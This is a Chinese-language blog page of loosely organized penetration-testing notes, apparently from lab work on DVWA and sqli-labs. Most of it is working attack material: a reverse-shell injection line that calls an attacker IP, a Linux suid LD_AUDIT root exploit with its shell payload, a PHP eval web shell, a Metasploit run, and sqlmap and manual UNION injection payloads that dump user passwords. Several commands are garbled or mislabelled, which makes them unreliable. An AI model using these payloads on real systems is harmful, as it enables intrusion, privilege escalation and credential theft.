安全 - 林小屋博客

摘要：astartx进入图形界面

astartx进入图形界面

端口扫描：

nmap 192.168.1.10 #扫描同一段的ip

nmap 192.168.1.0/24 #扫描整个段

nmap -sT 192.168.1.118 #-sT来实现tcp连接扫描

nmap -sU 192.168.1.119 #-sU来实现udp扫描

nmap -sN 22,25,80,3306 192.168.1.118 #扫描指定端口

nmap 192.168.1.118 -oX hh.xml #扫描结果导出到hh.xml

抓包：

tcpdump –nnX tcp and host 192.168.1.119 #这里的ip为攻击机

数据抓取监控

wireshark

转换格式：

xsltproc hh.xml -o hh.html

漏洞扫描：

firefox https://localhost:8834

msfconsole 攻击：

漏洞代码：MS04_007

search ms04_007 #查看该漏洞使用的exploit模块

use exploit/windows/iis/ms01_026_dbldecode #使用模块

show options #查看设置参数

set RHOST 192.168.1.173 #设置RHOST（攻击目标）

SET LHOST 192.168.1.174 #设置LHOST（攻击机）

show options #查看需要设置哪些配置参数

exploit #漏洞利用，会看到ip 192.168.1.173反弹连接到了我们本地的4444端口

成功！

DVWA渗透：

nc -v-l-p 80 #监听本机80端口

;/bin/bash –i > /dev/tcp/172.16.1.52/80|0<&1 2>&1 #在注入漏洞模块提交

此时本机Kali中会反弹回来一个被攻击机的shell

id #查看用户属性

uname -a #查看系统版本号

通过提取文档进行复制粘贴提取

;/bin/bash –i > /dev/tcp/10.1.7.69/80|0<&1 2>&1

<span style="color: rgb(51, 51, 51);"--<------------------------------------------

提权exp详细解析：

# 在/tmp下创建可控制的目录

$ mkdir /tmp/exploit

# 链接到suid二进制程序以更改$ORIGIN的定义

$ ln /bin/ping /tmp/exploit/target

# 打开到目标二进制程序的文件描述符

$ exec 3< /tmp/exploit/target

# 现在可通过/proc访问描述符

$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# 删除之前所创建的目录

$ rm -rf /tmp/exploit/

# /proc链接仍存在，但已标记为已被删除

$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# 使用负载DSO替换目录，使$ORIGIN成为到dlopen()的有效目标

$ cat > payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ ls -l /tmp/exploit

-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

<span style="color: rgb(51, 51, 51);"--<------------------------------------------

当UID=0，即得root权限

建立一个一句话木马文件

echo "<?php @ecal(\$_POST[\"elab\"]); ?>" > /dvw/aa.php

菜刀进入

http://172.16.1.57/dvwa/aa.php

sqlmap:

该界面是通过输入用户id 查询用户信息,用户id 是小于20的id

1.找到sql注入点，通过 ' 字符验证有SQL注入漏洞（1分）

1''

http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html

2.查看页面源代码，找到页面"Submit"的名字和值，并截屏（2分）

右键加V 查找

3.通过浏览器及其插件得到cookie 值，并截屏（2分）

4.在xclient 用sqlmap 做注入攻击，获取后台的数据库信息,操作系统信息，以及web系统信息，并截

屏（2分）

5.在xclient 用sqlmap 做注入攻击，获取当前数据库名，并截屏（2分）

sqlmap -r /root/aaa.txt --dbs

<code>./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”

2、-u : 指定目标URL

3、-b : 获取DBMS banner

4、–current-db : 获取当前数据库

5、–current-user:获取当前用户
</code>

#aaa.txt为cookie

安全-林小屋博客

6.在xclient 用sqlmap 做注入攻击，获取当前数据库的所有表,并截屏（2分）

sqlmap -r /root/aaa.txt -D dvwa --tables

安全-林小屋博客

7.猜测当前的用户信息表名，在xclient 用sqlmap 做注入攻击，获取当前数据库的用户表的结构，并截屏（2分）

sqlmap -r /root/aaa.txt -D dvwa -T users --columns

#-T : 要枚举的DBMS数据库表 –columns : 枚举 DBMS数据库表中的所有列

8.在xclient 用sqlmap 做注入攻击，获取当前数据库的用户表内容信息，并截屏（2分）

sqlmap -r /root/aaa.txt -D dvwa -T users-C user,password --dump

<code>- -T : 要枚举的DBMS数据表

- -C: 要枚举的DBMS数据表中的列

- –dump : 转储DBMS数据表项

用法：python sqlmap [options]
-

- 选项：
- &nbsp;&nbsp;-h，--help显示基本帮助消息并退出
- &nbsp;&nbsp;-hh显示高级帮助消息并退出
- &nbsp;&nbsp;--version显示程序的版本号并退出
- &nbsp;&nbsp;-v VERBOSE等级：0-6（默认值1）
-

- &nbsp;&nbsp;目标：
- &nbsp;&nbsp;&nbsp;&nbsp;必须提供这些选项中的至少一个来定义
- &nbsp;&nbsp;&nbsp;&nbsp;目标
-

- &nbsp;&nbsp;&nbsp;&nbsp;-u URL，--url = URL目标URL（例如“http://www.site.com/vuln.php?id=1”）
- &nbsp;&nbsp;&nbsp;&nbsp;-g GOOGLEDORK将Google dork结果作为目标网址进行处理
-

- &nbsp;&nbsp;请求：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于指定如何连接到目标URL
-

- &nbsp;&nbsp;&nbsp;&nbsp;--data = DATA通过POST发送的数据字符串
- &nbsp;&nbsp;&nbsp;&nbsp;--cookie = COOKIE HTTP Cookie头值
- &nbsp;&nbsp;&nbsp;&nbsp;--random-agent使用随机选择的HTTP User-Agent头值
- &nbsp;&nbsp;&nbsp;&nbsp;--proxy = PROXY使用代理连接到目标URL
- &nbsp;&nbsp;&nbsp;&nbsp;--tor使用Tor匿名网络
- &nbsp;&nbsp;&nbsp;&nbsp;- 检查Tor检查Tor是否正确使用
-

- &nbsp;&nbsp;注射：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于指定要测试的参数，
- &nbsp;&nbsp;&nbsp;&nbsp;提供自定义注入有效载荷和可选的篡改脚本
-

- &nbsp;&nbsp;&nbsp;&nbsp;-p TESTPARAMETER可测试参数
- &nbsp;&nbsp;&nbsp;&nbsp;--dbms = DBMS将后端DBMS强制为此值
-

- &nbsp;&nbsp;检测：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于自定义检测阶段
-

- &nbsp;&nbsp;&nbsp;&nbsp;--level = LEVEL要执行的测试级别（1-5，默认为1）
- &nbsp;&nbsp;&nbsp;&nbsp;--risk =风险执行测试的风险（0-3，默认值1）
-

- &nbsp;&nbsp;技术：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于调整特定SQL注入的测试
- &nbsp;&nbsp;&nbsp;&nbsp;技术
-

- &nbsp;&nbsp;&nbsp;&nbsp;--technique = TECH SQL注入技术使用（默认为“BEUSTQ”）
-

- &nbsp;&nbsp;枚举：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于枚举后端数据库
- &nbsp;&nbsp;&nbsp;&nbsp;管理系统信息，结构和数据包含在
- &nbsp;&nbsp;&nbsp;&nbsp;表。此外，您可以运行自己的SQL语句
-

- &nbsp;&nbsp;&nbsp;&nbsp;-a，--all检索所有内容
- &nbsp;&nbsp;&nbsp;&nbsp;-b，--banner检索DBMS横幅
- &nbsp;&nbsp;&nbsp;&nbsp;--current-user检索DBMS当前用户
- &nbsp;&nbsp;&nbsp;&nbsp;--current-db检索DBMS当前数据库
- &nbsp;&nbsp;&nbsp;&nbsp;--passwords枚举DBMS用户密码散列
- &nbsp;&nbsp;&nbsp;&nbsp;--tables枚举DBMS数据库表
- &nbsp;&nbsp;&nbsp;&nbsp;- 列列举DBMS数据库表列
- &nbsp;&nbsp;&nbsp;&nbsp;--schema枚举DBMS模式
- &nbsp;&nbsp;&nbsp;&nbsp;- 转储转储DBMS数据库表条目
- &nbsp;&nbsp;&nbsp;&nbsp;--dump-all转储所有DBMS数据库表条目
- &nbsp;&nbsp;&nbsp;&nbsp;-D DB DBMS数据库枚举
- &nbsp;&nbsp;&nbsp;&nbsp;-T TBL要列举的DBMS数据库表
- &nbsp;&nbsp;&nbsp;&nbsp;-C COL DBMS数据库表列列出
-

- &nbsp;&nbsp;操作系统访问：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于访问后端数据库管理
- &nbsp;&nbsp;&nbsp;&nbsp;系统底层操作系统
-

- &nbsp;&nbsp;&nbsp;&nbsp;--os-shell提示交互式操作系统shell
- &nbsp;&nbsp;&nbsp;&nbsp;--os-pwn提示OOB shell，Meterpreter或VNC
-

- &nbsp;&nbsp;一般：
- &nbsp;&nbsp;&nbsp;&nbsp;这些选项可用于设置一些一般工作参数
-

- &nbsp;&nbsp;&nbsp;&nbsp;--batch不要求用户输入，使用默认行为
- &nbsp;&nbsp;&nbsp;&nbsp;--flush-session刷新当前目标的会话文件
-

- &nbsp;&nbsp;杂：
- &nbsp;&nbsp;&nbsp;&nbsp;--sqlmap-shell提示交互式sqlmap shell
- &nbsp;&nbsp;&nbsp;&nbsp;--wizard初学者用户的简单向导界面
-

- [！]以“-hh”运行的完整选项列表
- root @ kali：〜＃
</code>

sql手动注入：

http://localhost/sqlilabs/Less-2/?id=1id是一个注入点

后台的SQL语句的写法大致为

1	`select username,password,[....] from table where id=userinput`

那么我们通过使用order by的语句来判断select所查询字段的数目。# SELECT 语句用于从表中选取数据。

那么payload变为：

1	`http://localhost/sqlilabs/Less-2/?id=1` `order` `by` `1/2/3/4....`

当使用order by 4时程序出错，那么select的字段一共是3个。

得到显示位

在页面上会显示从select中选取的字段，我们接下来就是要判断显示的字段是哪几个字段。

使用如下的payload(两者均可)进行判断。

1 2	`http://localhost/sqlilabs/Less-2/?id=-1` `union` `select` `1,2,3` `http://localhost/sqlilabs/Less-2/?id=1` `and` `1=2` `union` `select` `1,2,3`

当使用个如上的payload时，页面的显示如下：

安全-林小屋博客

通过如上的页面显示就可以知道，页面中显示的是第2位和第3位的信息。

查选库

在知道了显示位之后，那么接下来就可以通过显示位来显示我们想知道的信息，如数据库的版本，用户信息等等。那么我们使用如下的payload就可以知道相关的信息。

1	`http://localhost/sqlilabs/Less-2/?id=-1` `union` `select` `1,version(),database()`

此时页面的显示为：

安全-林小屋博客

可以看到在页面上就出现了数据库的版本信息和当前使用的数据库信息。

那么接下来我们通过这种方式知道数据库中所有的数据库的名称。

payload如下：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一个库名

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二个库名

...

查选表名

由于database()返回的就是当前web程序所使用的数据库名，那么我们就利用database()来查询所有的表信息。当然在上一步中。我们也已经知道当前的database就是security。

那么我们构造的payload如下：

1	`http://localhost/sqlilabs/Less-2/?id=-1` `union` `select` `1,group_concat(table_name),3` `from` `information_schema.tables` `where` `table_schema=database()`

这样我们就得到当前数据库下所有的表名了。页面返回的结果是：

安全-林小屋博客

所以我们知道在当前的数据库中存在4张表，分别是emails,referers,uagents,users。

查选列名

在知道了表名之后，接下来我们利用information_schema.columns就可以根据表名来获取当前表中所有的字段。

payload如下：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六进制)

页面的显示结果如下：

通过这个语句，我们就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password这些字段。但是我本地测试的测试的时候，这个存在一个问题，实际上在security数据库的users的表中，只有id,username,password这3个字段，其他的字段都是其他数据库的中users表的字段名。

通过上面的payload，我们也同样可以知道在emails,referers,uagents中的字段名称。

但是有的时候后台的代码可能仅用了使用where子句，那么这个时候就无法通过information_schema.coumns来得到列名了，这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单，使用exists子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。

猜解的语句如下:

1	`http://localhost/sqlilabs/Less-2/?id=1` `and` `exists(select` `uname` `from` `users)`

主要的语句就是exists(select 需要猜解的列名 from users)这种句式。如果在users表中不存在uname列名，则页面不会显示内容或者是直接出现sql的错误语句。

如下如所示：

安全-林小屋博客

下面这个就是猜解到了users表中存在的字段。

1	`http://localhost/sqlilabs/Less-2/?id=1` `and` `exists(select` `username` `from` `users)`

猜测在users表中存在username列，上面的语句程序可以正常第返回结果，那么寿命在users表中确实存在username列名。

脱裤

在知道了当前数据库所有的表名和字段名之后，接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。

可以使用如下的payload：

1	`http://localhost/sqlilabs/Less-2/?id=-1` `union` `select` `1,group_concat(username,password),3` `from` `users`

就可以得到users表中所有的username和password的数据了，通过这种方式也能够得到其他表中的数据了。

2）：

union select 1,2,3,4,5,6,7,8,9,10,11 from #说明字段长度是

1' union select database(),user()# 查询user用户

-1' union select database(),user()#

-1' union select version(),@@version_compile_os#

version() 获取当前数据库版本,@@version_compile_os获取当前操作系统

-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#

爆出dvwa表,2可修改

-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'# 查看表名为users的

查看表名为user的

-1' union select user,password from users#

爆出users表的user和password数据

php sql注入：

safe_mode = on 开启过滤 'OR"=' 万能账号

xss 跨脚本攻击：

user='<script>alert(document.cookie);</script>'

防护：magic_quotes_gpc

%22><script>alert(document.cookie);</script>

DVWA手动注

HackBar 网页调试插件

http://10.1.4.30/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

1' union select database(),user()#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=1%27+union+select+database%28%29%2Cuser

%28%29%23&Submit=%E6%8F%90%E4%BA%A4#

------------

ID：1'union select database（），user（）＃

名字：admin

姓氏：admin

ID：

1'union select database（），user（）＃

名字：dvwa

姓氏：root @ localhost

-------------------------------------------------------------------------------------

-1' union select database(),user()#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+database%28%29%2Cuser

%28%29%23&Submit=%E6%8F%90%E4%BA%A4#

------------

ID：

-1'union select database（），user（）＃名字：dvwa

姓氏：root @ localhost

---------------------------------------------------------------------------------------

-1' union select version(),@@version_compile_os#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+version%28%29%2C

%40%40version_compile_os%23&Submit=%E6%8F%90%E4%BA%A4#

------------

version() 获取当前数据库版本,@@version_compile_os获取当前操作系统

ID：-1'union select version（），@@ version_compile_os＃

名字：5.5.48-log

姓氏：Linux

---------------------------------------------------------------------------------------

-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#

ID：-1'union select table_name，2 from information_schema.tables where table_schema

='dvwa'＃

名：guestbook

姓氏：2

ID：-1'union select table_name，2 from information_schema.tables where table_schema

='dvwa'＃

名字：users

姓氏：2

爆出来两个表

------------------------------------------------------------------------------------------

-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#